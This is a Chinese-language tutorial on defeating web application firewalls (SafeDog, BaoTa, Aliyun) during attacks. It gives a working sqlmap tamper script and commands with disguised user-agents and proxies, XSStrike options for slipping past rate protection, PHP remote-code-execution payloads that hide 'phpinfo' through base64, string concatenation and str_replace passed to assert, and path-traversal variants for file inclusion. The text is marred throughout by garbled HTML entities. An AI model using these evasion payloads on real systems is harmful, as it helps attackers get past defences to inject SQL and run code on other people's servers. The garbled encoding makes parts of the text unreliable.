目录

前言&＃xff1a;

&＃xff08;一&＃xff09;SQL注入

0x01  sqlmap注入

修改user-agent头&＃xff1a;

&＃xff08;二&＃xff09;文件上传

&＃xff08;三&＃xff09;XSS跨站

&＃xff08;四&＃xff09;RCE绕过waf

RCE代码&＃xff1a;

1.输入echo 123; 并执行&＃xff0c;成功输出

 2.但是当输入phpinfo();

 3.打开宝塔的日志

 4.可逆加解密

 5、宝塔拦截

 6、拼接绕过

7、str_replace函数替换变量中指定的字符串为空

 8、禁用assert绕过

 9、改变提交方式

&＃xff08;五&＃xff09;文件包含

前言&＃xff1a;

        这里介绍常见的漏洞利用绕过的方法&＃xff0c;方法有很多很多&＃xff0c;一定要有自己的思想&＃xff0c;就拿逻辑漏洞来说&＃xff0c;AWVS、AppScan、Xray、Nessus、Sqlmap......这些自动化工具是扫描不出来的&＃xff0c;加密编码绕过&＃xff1f;算法可逆&＃xff1f;关键字绕过&＃xff1f;提交方法&＃xff1f;各种测试&＃xff1f;要学会尝试自己造轮子&＃xff0c;本篇文章引入几种简单方式&＃xff0c;希望打开大家思路

        之前简单总结过&＃xff0c;感兴趣的点这里

&＃xff08;一&＃xff09;SQL注入

0x01  sqlmap注入

防cc拦截&＃xff1a;修改user-agent头&＃43;代理&＃xff08;付费代理池&＃xff09;

修改user-agent头&＃xff1a;

&＃xff08;1&＃xff09;加参数&＃xff1a;--random-agent 

&＃xff08;2&＃xff09;加参数&＃xff1a;--user-agent&＃61;"Mozilla/5.0 (compatible; Googlebot/2.1; &＃43;http://www.google.com/bot.html)"&＃xff08;利用爬虫技术&＃xff09;

各大搜索引擎的User-Agent&＃xff1a;https://www.jinyouxin.com/iack/p/3557371.html

&＃xff08;3&＃xff09;修改配置文件sqlmap.conf中的agent变量值

加代理&＃xff1a;--proxy&＃61;"http:tps123.kdlapi.com:15818"

绕过安全狗&＃xff1a;自写tamper模块&＃xff0c;参考如下waf-dog.py

绕过Aliyun&＃xff1a;基本修改指纹即可&＃xff08;修改user-agent头&＃xff09;

绕过宝塔&＃xff1a;匹配关键字外加/*等&＃xff0c;我们可以通过%00进行截断.eg:%00/*!select ...*/

安全狗&＃xff1a;参考之前 payload&＃xff08;现在不行了&＃xff09;

from lib.core.enums import PRIORITY__priority__ &＃61; PRIORITY.HIGHdef tamper(payload, **kwargs):retVal &＃61; ""if payload:payload &＃61; payload.replace("union", "%23a%0union")payload &＃61; payload.replace("select", "/*!44534select*/")payload &＃61; payload.replace("%20", "%23a%0a")payload &＃61; payload.replace("", "%23a%0a")payload &＃61; payload.replace("database()","database%23a%0a()")return payload


sqlmap.py 利用

python sqlmap.py -u "http://192.168.224.130/xscj/pikachu-master/vul/sqli/sqli_str.php?name&＃61;1%22&submit&＃61;%E6%9F%A5%E8%AF%A2" --random-agent --tamper&＃61;ridog.py

&＃xff08;二&＃xff09;文件上传

更改上传后缀名的格式&＃xff08;很多方法&＃xff0c;具体在文件上传的笔记&＃xff0c;这里就不多说了&＃xff09;

 文件上传漏洞__Cyber的博客-CSDN博客_常见的文件上传漏洞

&＃xff08;三&＃xff09;XSS跨站

利用 XSStrike工具进行测试
此时如果对方网站开启cc防护&＃xff1a;
1.由于是工具&＃xff0c;需要设置一个代理
2.设置延迟参数

XSStrike参数&＃xff1a;

-h, --help //显示帮助信息
-u, --url //指定目标 URL
--data //POST 方式提交内容
-v, --verbose //详细输出
-f, --file //加载自定义 paload 字典
-t, --threads //定义线程数
-l, --level //爬行深度
-t, --encode //定义 payload 编码方式
--json //将 POST 数据视为 JSON
--path //测试 URL 路径组件
--seeds //从文件中测试、抓取 URL
--fuzzer //测试过滤器和 Web 应用程序防火墙。
--update //更新
--timeout //设置超时时间
--params //指定参数
--crawl //爬行
--proxy //使用代理
--blind //盲测试
--skip //跳过确认提示
--skip-dom //跳过 DOM 扫描
--headers //提供 HTTP 标头
-d, --delay //设置延迟


&＃xff08;四&＃xff09;RCE绕过waf

RCE代码&＃xff1a;

接收post传入的参数&＃xff0c;并且通过eval执行&＃xff0c;如果没执行成功则输出字符串

当对方网站上存在RCE漏洞&＃xff0c;但是开启了安全狗和宝塔时&＃xff1a;

1.输入echo 123; 并执行&＃xff0c;成功输出

 2.但是当输入phpinfo();

   此时&＃xff0c;连接被重置了&＃xff0c;此处是因为敏感字符被waf检测到了所以进行拦截

 被拦截了&＃xff1a;

 3.打开宝塔的日志

        发现是被宝塔拦截了&＃xff0c;因为post传入的参数被检测出来触发了它的过滤规则

 4.可逆加解密

        此时我们想到通过base64加密解密来绕过phpinfo(); 这个关键字&＃xff0c;先把phpinfo();用base64加密&＃xff0c;结果为cGhwaW5mbygpOw&＃61;&＃61;&＃xff0c;然后用php中的base64解密函数base64_decode()进行解密&＃xff0c;所以在输入框内base64_decode(‘cGhwaW5mbygpOw&＃61;&＃61;’);提交即可

        当post将字符串base64_decode(‘cGhwaW5mbygpOw&＃61;&＃61;’);提交后&＃xff0c;对方后台接收到post值&＃xff0c;并通过eval将字符串当成php代码执行&＃xff0c;就成功对加密后的phpinfo();进行了解密还原。

 5、宝塔拦截

        提交后发现又被拦截了&＃xff0c;此时我们打开宝塔的日志看了一眼&＃xff0c;又被匹配到了敏感参数&＃xff0c;这次是base64_decode()&＃xff08;我感觉就算没有拦截的话&＃xff0c;通过上面源码看&＃xff0c;传入后也执行不了&＃xff0c;会报语法错误&＃xff09;

 6、拼接绕过

        因为waf只是拦截关键字&＃xff0c;我们用字符串将关键字拼接起来&＃xff0c;waf就不会识别到&＃xff0c;并且可以执行同样的功能。
 例子&＃xff1a;
$a&＃61;&＃39;php&＃39;.&＃39;info();&＃39;;assert($a);
将php和info(); 拼接起来赋值给变量a&＃xff0c;再通过assert对执行变量a

 

7、str_replace函数替换变量中指定的字符串为空

$y&＃61;str_replace(&＃39;x&＃39;,&＃39;&＃39;,&＃39;pxhpxinxfo()&＃39;);assert($y);

 8、禁用assert绕过

        上面的方法都有用到assert来执行phpinfo(); 如果assert也被过滤了呢&＃xff1f;此时我们也可以用拼接字符串或者str_replace拆分来绕过关键字

 9、改变提交方式

当然可以通过$_REQUEST提交方式绕过

 总之方法又很多&＃xff0c;值得去思考&＃xff01;

​​​​​​​&＃xff08;五&＃xff09;文件包含

以下几种&＃xff1a;..\ ..../ ..\.\等